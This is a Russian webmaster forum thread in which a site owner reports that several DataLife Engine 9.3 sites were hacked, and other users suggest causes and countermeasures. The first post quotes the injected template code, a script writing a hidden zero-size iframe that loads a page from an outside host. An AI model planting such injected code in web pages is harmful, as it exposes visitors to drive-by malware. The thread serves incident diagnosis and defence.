X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали несколько сайтов на ДЛЕ
bmp104
bmp104
Topic Starter сообщение 28.12.2011, 17:45; Ответить: bmp104
Сообщение #1


Завсегдатай
*****


Группа: Active User
Сообщений: 680
Регистрация: 13.12.2010
Поблагодарили: 55 раз
Репутация:   10  


Взломали несколько сайтов на ДЛЕ 9.3, в шаблоне main появился код:

<script type="text/javascript">
function writeHTMLasJS(){
document.write("<iframe src=\"http:\/\/75.zapto.org\/bleedeng\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"> <\/iframe>");
}
</script>

<!--
now place this function call at whatever point
it needs to write the markup on to the page: -->

<script type="text/javascript">
writeHTMLasJS();
</script>


Может кто уже сталкивался с таким же, подскажите как могли ломануть.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
un1name1d
un1name1d
сообщение 28.12.2011, 17:47; Ответить: un1name1d
Сообщение #2


Синдром вахтёра на пенсии
******


Группа: Active User
Сообщений: 1686
Регистрация: 20.1.2011
Поблагодарили: 1906 раз
Репутация:   172  


http://www.maultalk.com/topic101650s0.html (хотя там WP, а здесь - ДЛЕ, ну да ладно, методы профилактики подходят).

Сообщение отредактировал un1name1d - 28.12.2011, 17:48
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
nick777
сообщение 29.12.2011, 0:20; Ответить: nick777
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 653
Регистрация: 19.9.2010
Из: Россия, город Москва Кто: Веб-мастер/блоггер Блог url: partnerki-runeta.ru
Поблагодарили: 105 раз
Репутация:   11  


un1ymous, +1.

Еще хочу добавить, что на DLE часто модули разные уязвимы - погуглите: "название модуля +уязвимость" - так с каждым модулем. Еще не помешает: "версия dle +уязвимость".


--------------------
На мобильной рекламе можно зарабатывать по-белому здесь!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
referer
referer
сообщение 29.12.2011, 0:25; Ответить: referer
Сообщение #4


Завсегдатай
*****


Группа: Active User
Сообщений: 684
Регистрация: 20.11.2010
Из: Украина, Николаев
Поблагодарили: 78 раз
Репутация:   25  


дле не ломали у меня хоть и версии древние 8-е на двух сайтах, но за джумлу знаю что постоянно домают)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
xadminx
xadminx
сообщение 29.12.2011, 0:38; Ответить: xadminx
Сообщение #5


Новичок
*

Группа: Viewer
Сообщений: 11
Регистрация: 6.12.2010
Поблагодарили: 1 раз
Репутация:   0  


могли у вас увести пароли от фтп


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
hostingbloger
hostingbloger
сообщение 29.12.2011, 1:09; Ответить: hostingbloger
Сообщение #6


Новичок
*

Группа: User
Сообщений: 31
Регистрация: 28.12.2011
Поблагодарили: 2 раза
Репутация:   -3  


Какие права стоят на /uploads и на /templates ? 777?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZorG
ZorG
сообщение 29.12.2011, 2:12; Ответить: ZorG
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 84
Регистрация: 7.8.2010
Поблагодарили: 7 раз
Репутация:   3  


Что в логах?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Exebit
Exebit
сообщение 30.12.2011, 10:30; Ответить: Exebit
Сообщение #8


Новичок
*

Группа: Viewer
Сообщений: 4
Регистрация: 26.12.2011
Поблагодарили: 1 раз
Репутация:   0  


Попробуйте запустить антивирус встроенный в DLE 9.3 он покажет все левые файлы, а там уже можно прикинуть как сломали и еще какая версия движка, официальная или зануленная?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bmp104
bmp104
Topic Starter сообщение 6.2.2012, 13:37; Ответить: bmp104
Сообщение #9


Завсегдатай
*****


Группа: Active User
Сообщений: 680
Регистрация: 13.12.2010
Поблагодарили: 55 раз
Репутация:   10  


Какие права стоят на /uploads и на /templates ? 777?


Да, при установке сказано их ставить.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Продвижение сайтов по методу прозрачной схемы работы
SEO услуги: аудиты, семантические ядра, оптимизации, консультации
20 LIDRM 2285 Сегодня, 8:58
автор: LIDRM
Открытая тема (нет новых ответов) Недорогой дизайн сайтов | баннеров | слайдеров
редактирование видео
12 shredinger 2176 Вчера, 13:13
автор: maxanalog
Открытая тема (нет новых ответов) 12 Жирных вечных ссылок с медицинских сайтов.
4 dimapwt 720 9.12.2017, 13:20
автор: dimapwt
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлы11 отличных новостных сайтов с ТИЦ до 475
Подходят разные тематики
25 kater1 4202 8.12.2017, 20:43
автор: kater1
Открытая тема (нет новых ответов) Трафик для ваших сайтов
Средняя цена 90р. за 1000 посетителей
19 Fine 7984 8.12.2017, 18:43
автор: Fine


 



RSS Текстовая версия Сейчас: 11.12.2017, 10:17
Дизайн